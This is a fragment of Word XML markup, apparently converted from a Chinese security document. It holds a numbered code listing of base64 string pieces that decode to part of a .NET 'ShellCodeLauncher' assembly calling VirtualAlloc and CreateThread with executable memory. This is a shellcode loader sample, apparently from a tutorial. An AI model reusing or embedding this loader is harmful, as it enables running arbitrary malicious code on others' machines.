2792,14716,2794,14716,2797,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14718,2800,14718,2800,14718,2800,14718,2800,14719,2800,14719,2800,14719,2800,14719,2800,14720,2800,14720,2800,14721,2800,14721,2800,14721,2800,14722,2800,14722,2800,14723,2800,14723,2800,14724,2800,14725,2800,14725,2800,14726,2800,14727,2800,14728,2800,14728,2800,14729,2800,14730,2800,14731,2800,14732,2800,14733,2800,14734,2800,14735,2800,14736,2800,14738,2800,14739,2800,14740,2800,14742,2800,14743,2800,14744,2800,14746,2800,14748,2800,14749,2800,14751,2800,14752,2800,14754,2800,14756,2800,14758,2800,14760,2800,14762,2800,14764,2800,14766,2800,14768,2800,14771,2800,14773,2800,14775,2800,14778,2800,14780,2800,14783,2800,14786,2800,14788,2800,14791,2800,14794,2800,14797,2800,14800,2800,14803,2800,14806,2800,14809,2800,14813,2800,14816,2800,14820,2800,14823,2800,14827,2800,14831,2800,14834,2800,14838,2800,14842,2800,14846,2800,14850,2800,14855,2800,14859,2800,14863,2800,14868,2800,14872,2800,14877,2800,14882,2800,14887,2800,14892,2800,14897,2800,14902,2800,14907,2800,14912,2800,14918,2800,14923,2800,14929,2800,14935,2800,14941,2800,14947,2800,14953,2800,14959,2800,14965,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2799,14972,2799,14972,2799,14972,2799,14972,2799,14972,2799,14972,2798,14972,2798,14972,2798,14972,2798,14972,2798,14972,2797,14972,2797,14972,2797,14972,2797,14972,2796,14972,2796,14972,2795,14972,2795,14972,2795,14972,2794,14972,2794,14972,2793,14972,2793,14972,2793,14972,2792,14972,2792,14972,2791,14972,2790,14972,2790,14972,2789,14972,2789,14972,2788,14972,2787,14972,2787,14972,2786,14972,2785,14972,2784,14972,2783,14972,2783,14972,2782,14972,2781,14972,2780,14972,2779,14972,2778,14972,2777,14972,2776,14972,2775,14972,2774,14972,2773,14972,2772,14972,2770,14972,2769,14972,2768,14972,2767,14972,2765,14972,2764,14972,2763,14972,2761,14972,2760,14972,2758,14972,2757,14972,2755,14972,2753,14972,2752,14972,2750,14972,2748,14972,2747,14972,2745,14972,2743,14972,2741,14972,2739,14972,2737,14972,2735,14972,2733,14972,2731,14972,2729,14972,2727,14972,2725,14972,2723,14972,2720,14972,2718,14972,2716,14972,2713,14972,2711,14972,2708,14972,2706,14972,2703,14972,2700,14972,2698,14972,2695,14972,2692,14972,2689,14972,2686,14972,2683,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14970,2680,14970,2680,14970,2680,14970,2680,14969,2680,14969,2680,14969,2680,14969,2680,14968,2680,14968,2680,14967,2680,14967,2680,14967,2680,14966,2680,14966,2680,14965,2680,14964,2680,14964,2680,14963,2680,14963,2680,14962,2680,14961,2680,14960,2680,14960,2680,14959,2680,14958,2680,14957,2680,14956,2680,14955,2680,14954,2680,14953,2680,14951,2680,14950,2680,14949,2680,14948,2680,14946,2680,14945,2680,14944,2680,14942,2680,14940,2680,14939,2680,14937,2680,14935,2680,14934,2680,14932,2680,14930,2680,14928,2680,14926,2680,14924,2680,14922,2680,14920,2680,14917,2680,14915,2680,14913,2680,14910,2680,14908,2680,14905,2680,14902,2680,14900,2680,14897,2680,14894,2680,14891,2680,14888,2680,14885,2680,14882,2680,14879,2680,14875,2680,14872,2680,14868,2680,14865,2680,14861,2680,14857,2680,14854,2680,14850,2680,14846,2680,14842,2680,14838,2680,14833,2680,14829,2680,14825,2680,14820,2680,14816,2680,14811,2680,14806,2680,14801,2680,14796,2680,14791,2680,14786,2680,14781,2680,14775,2680,14770,2680,14764,2680,14759,2680,14753,2680,14747,2680,14741,2680,14735,2680,14729,2680,14723,2680,14716e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:766.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,15330" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:15330;width:130;height:270" coordorigin="2670,15330" coordsize="130,270" path="m2680,15347l2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2682,15347,2682,15347,2682,15347,2682,15347,2682,15347,2682,15347,2683,15347,2683,15347,2683,15347,2683,15347,2684,15347,2684,15347,2684,15347,2685,15347,2685,15347,2685,15347,2686,15347,2686,15347,2686,15347,2687,15347,2687,15347,2688,15347,2688,15347,2689,15347,2689,15347,2690,15347,2690,15347,2691,15347,2692,15347,2692,15347,2693,15347,2694,15347,2694,15347,2695,15347,2696,15347,2697,15347,2697,15347,2698,15347,2699,15347,2700,15347,2701,15347,2702,15347,2703,15347,2704,15347,2705,15347,2706,15347,2707,15347,2708,15347,2709,15347,2710,15347,2712,15347,2713,15347,2714,15347,2715,15347,2717,15347,2718,15347,2720,15347,2721,15347,2723,15347,2724,15347,2726,15347,2727,15347,2729,15347,2731,15347,2732,15347,2734,15347,2736,15347,2738,15347,2740,15347,2741,15347,2743,15347,2745,15347,2747,15347,2749,15347,2752,15347,2754,15347,2756,15347,2758,15347,2760,15347,2763,15347,2765,15347,2768,15347,2770,15347,2773,15347,2775,15347,2778,15347,2780,15347,2783,15347,2786,15347,2789,15347,2792,15347,2794,15347,2797,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15348,2800,15348,2800,15348,2800,15348,2800,15348,2800,15349,2800,15349,2800,15349,2800,15349,2800,15350,2800,15350,2800,15350,2800,15351,2800,15351,2800,15352,2800,15352,2800,15353,2800,15353,2800,15354,2800,15354,2800,15355,2800,15356,2800,15356,2800,15357,2800,15358,2800,15359,2800,15360,2800,15361,2800,15361,2800,15362,2800,15363,2800,15365,2800,15366,2800,15367,2800,15368,2800,15369,2800,15371,2800,15372,2800,15373,2800,15375,2800,15376,2800,15378,2800,15379,2800,15381,2800,15383,2800,15385,2800,15386,2800,15388,2800,15390,2800,15392,2800,15394,2800,15396,2800,15399,2800,15401,2800,15403,2800,15406,2800,15408,2800,15411,2800,15413,2800,15416,2800,15419,2800,15421,2800,15424,2800,15427,2800,15430,2800,15433,2800,15436,2800,15440,2800,15443,2800,15446,2800,15450,2800,15453,2800,15457,2800,15461,2800,15465,2800,15469,2800,15472,2800,15477,2800,15481,2800,15485,2800,15489,2800,15494,2800,15498,2800,15503,2800,15507,2800,15512,2800,15517,2800,15522,2800,15527,2800,15532,2800,15537,2800,15543,2800,15548,2800,15554,2800,15559,2800,15565,2800,15571,2800,15577,2800,15583,2800,15589,2800,15595,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2799,15602,2799,15602,2799,15602,2799,15602,2799,15602,2799,15602,2798,15602,2798,15602,2798,15602,2798,15602,2798,15602,2797,15602,2797,15602,2797,15602,2797,15602,2796,15602,2796,15602,2795,15602,2795,15602,2795,15602,2794,15602,2794,15602,2793,15602,2793,15602,2793,15602,2792,15602,2792,15602,2791,15602,2790,15602,2790,15602,2789,15602,2789,15602,2788,15602,2787,15602,2787,15602,2786,15602,2785,15602,2784,15602,2783,15602,2783,15602,2782,15602,2781,15602,2780,15602,2779,15602,2778,15602,2777,15602,2776,15602,2775,15602,2774,15602,2773,15602,2772,15602,2770,15602,2769,15602,2768,15602,2767,15602,2765,15602,2764,15602,2763,15602,2761,15602,2760,15602,2758,15602,2757,15602,2755,15602,2753,15602,2752,15602,2750,15602,2748,15602,2747,15602,2745,15602,2743,15602,2741,15602,2739,15602,2737,15602,2735,15602,2733,15602,2731,15602,2729,15602,2727,15602,2725,15602,2723,15602,2720,15602,2718,15602,2716,15602,2713,15602,2711,15602,2708,15602,2706,15602,2703,15602,2700,15602,2698,15602,2695,15602,2692,15602,2689,15602,2686,15602,2683,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15600,2680,15600,2680,15600,2680,15600,2680,15599,2680,15599,2680,15599,2680,15599,2680,15598,2680,15598,2680,15597,2680,15597,2680,15596,2680,15596,2680,15595,2680,15595,2680,15594,2680,15594,2680,15593,2680,15592,2680,15591,2680,15591,2680,15590,2680,15589,2680,15588,2680,15587,2680,15586,2680,15585,2680,15584,2680,15583,2680,15582,2680,15581,2680,15579,2680,15578,2680,15577,2680,15575,2680,15574,2680,15572,2680,15571,2680,15569,2680,15567,2680,15566,2680,15564,2680,15562,2680,15560,2680,15558,2680,15556,2680,15554,2680,15552,2680,15550,2680,15548,2680,15545,2680,15543,2680,15541,2680,15538,2680,15535,2680,15533,2680,15530,2680,15527,2680,15524,2680,15521,2680,15518,2680,15515,2680,15512,2680,15509,2680,15506,2680,15502,2680,15499,2680,15495,2680,15491,2680,15488,2680,15484,2680,15480,2680,15476,2680,15472,2680,15468,2680,15464,2680,15459,2680,15455,2680,15450,2680,15446,2680,15441,2680,15436,2680,15432,2680,15427,2680,15422,2680,15416,2680,15411,2680,15406,2680,15400,2680,15395,2680,15389,2680,15383,2680,15378,2680,15372,2680,15366,2680,15359,2680,15353,2680,15347e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>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86" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1339" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>70</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"AAAjR1VJRAAAACwGAAA0AQAAI0Jsb2IAAAAAAAAAAgAAAVfVAjQJAgAAAPolMwAWAAABA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAADwAA"</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71</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"AAQAAAADAAAABgAAAAwAAAALAAAABAAAAAEAAAABAAAAAQAAAAEAAAADAAAAAQAAAAEAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AABAAAA"</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72</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"AQAAAAAACgABAAAAAAAGAD0ANgAGAE0BMQEGAGkBMQEGAJgBeAEGALgBeAEGANsBNgAGA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CUCeAEG"</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73</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"AEACNgAGAHwCeAEGAIsCNgAGAJECNgAGALQCNgAGAOYCxwIGAPgCxwIGACsDGwMAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>QAAAAAA"</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74</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"AQABAAEAEAATABsABQABAAEAAAAAAOABAAAFAAMABwATAQAASgIAACEABAAHABEATwASA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BEAWgAS"</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75</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"ABMBaAI+AFAgAAAAAIYYRAAKAAEAaCIAAAAAkQBKAA4AAQAAAAAAgACRIHEAFQABAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ACAAJEg"</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76</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"fgAdAAUAAAAAAIAAkSCLACgACwDZIgAAAACRGBQDDgANAAAAAQCfAAAAAgCrAAAAAwCwA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAABADB"</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77</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"AAAAAQDLAAAAAgDeAAAAAwDqAAAABAD5AAAABQD/AAAABgAPAQAAAQAaAQAAAgAiAREAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAuACEA"</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78</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"RAA0ACkARAAKAAkARAAKADkARAAKAEkApAJCAGEAuwJKAGkA7gJPAGEA8wJYAHEARABkA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HkARAAK"</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79</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"ACcAWwA5AC4AEwBpAC4AGwByAGMAKwA5AAgABgCRAAEA/gEAAAQAWwALAwABBwBxAAEAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AEJAH4A"</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80</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"AQAAAQsAiwABAGggAAADAASAAAAAAAAAAAAAAAAAAAAAANYBAAAEAAAAAAAAAAAAAAABA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C0AAAAA"</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81</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"AAQAAwAAAAA8TW9kdWxlPgAyMjIyLmRsbABQcm9ncmFtAFNoZWxsQ29kZUxhdW5jaGVyA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>G1zY29y"</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82</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"bGliAFN5c3RlbQBPYmplY3QALmN0b3IATWFpbgBNRU1fQ09NTUlUAFBBR0VfRVhFQ1VUR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>V9SRUFE"</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83</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"V1JJVEUAVmlydHVhbEFsbG9jAENyZWF0ZVRocmVhZABXYWl0Rm9yU2luZ2xlT2JqZWN0A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GxwU3Rh"</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84</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"cnRBZGRyAHNpemUAZmxBbGxvY2F0aW9uVHlwZQBmbFByb3RlY3QAbHBUaHJlYWRBdHRya</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>WJ1dGVz"</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85</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"AGR3U3RhY2tTaXplAGxwU3RhcnRBZGRyZXNzAHBhcmFtAGR3Q3JlYXRpb25GbGFncwBsc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>FRocmVh"</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86</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"ZElkAGhIYW5kbGUAZHdNaWxsaXNlY29uZHMAU3lzdGVtLlNlY3VyaXR5LlBlcm1pc3Npb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>25zAFNl"</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87</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"Y3VyaXR5UGVybWlzc2lvbkF0dHJpYnV0ZQBTZWN1cml0eUFjdGlvbgBTeXN0ZW0uUnVud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GltZS5D"</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88</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"b21waWxlclNlcnZpY2VzAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAUnVud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GltZUNv"</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89</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"bXBhdGliaWxpdHlBdHRyaWJ1dGUAMjIyMgBCeXRlADxQcml2YXRlSW1wbGVtZW50YXRpb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>25EZXRh"</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90</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"aWxzPntBODMyQkQ0MS1EQjgyLTQ0NzEtOEMxRC1BMDlBNDFCQjAzRER9AENvbXBpbGVyR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2VuZXJh"</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91</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"dGVkQXR0cmlidXRlAFZhbHVlVHlwZQBfX1N0YXRpY0FycmF5SW5pdFR5cGVTaXplPTUxM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAkJG1l"</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92</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"dGhvZDB4NjAwMDAwMi0xAFJ1bnRpbWVIZWxwZXJzAEFycmF5AFJ1bnRpbWVGaWVsZEhhb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mRsZQBJ"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:pict>
